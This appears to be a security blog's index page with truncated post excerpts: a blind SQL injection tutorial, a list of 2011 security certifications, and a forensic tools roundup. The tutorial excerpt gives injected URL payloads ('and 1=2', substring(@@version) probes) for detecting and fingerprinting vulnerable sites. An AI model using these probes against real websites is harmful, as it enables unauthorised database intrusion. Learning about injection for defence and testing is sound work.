Posts

Facebook Sql injection

Injection Include: ...

Blind SQL Injection tutorial

Let's start with advanced stuff. I will be using our example http://www.site.com/news.php?id=5. When we execute this, we see some page and articles on that page, pictures, etc. Then, when we want to test it for a blind SQL injection attack: http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's OK. Now the real test: http://www.site.com/news.php?id=5 and 1=2 <--- this is false, so if some text, picture or some content is missing on the returned page then that site is vulnerable to blind SQL injection. 1) Get the MySQL version. To get the version in a blind attack we use substring, i.e. http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4. This should return TRUE if the version of MySQL is 4. Replace 4 with 5, and if the query returns TRUE then th...

Top 5 IT Security Certifications for 2011

In today’s tough IT market having a security certification that recruiters want can mean the difference between getting that next job or not. “A certification today is like a college degree,” says Grad Summers, Americas leader for information security program management services at Ernst & Young. “You may not hire a candidate just because they have one, but it is something that you come to expect in this field.” Here are the top five security certifications for 2011, compiled by scanning job boards and interviewing IT security recruiters and employers:

Vendor Certifications

A growing need for hands-on network engineers, along with social computing and Web 2.0 technology, has propelled network security even further. Vendor certifications including Cisco’s Certified Network Associate Certification (CCNA), Microsoft’s Certified Systems Engin...

Top 5 Hack Tools for Hackers to Investigate

List of top 5 hack tools for hackers to investigate or perform forensics on a computer system or PC:

1. Live View
2. Start up List
3. Open Files View
4. Wireshark
5. Helix 3

Working of the above tools, stepwise:

1. Live View

Live View is an open source utility that creates a virtual machine of the existing system. Live View creates a virtual disk out of the system that allows you to then safely investigate a copy of the system without interfering with anything installed. So you can easily investigate your system virtually without affecting the original system. Now restart your PC for further investigations and tools to use. You can download Live View for free here.

2. Start up List

Now you have a virtual copy of your system, so why wait? Let's start investigating the PC. So download th...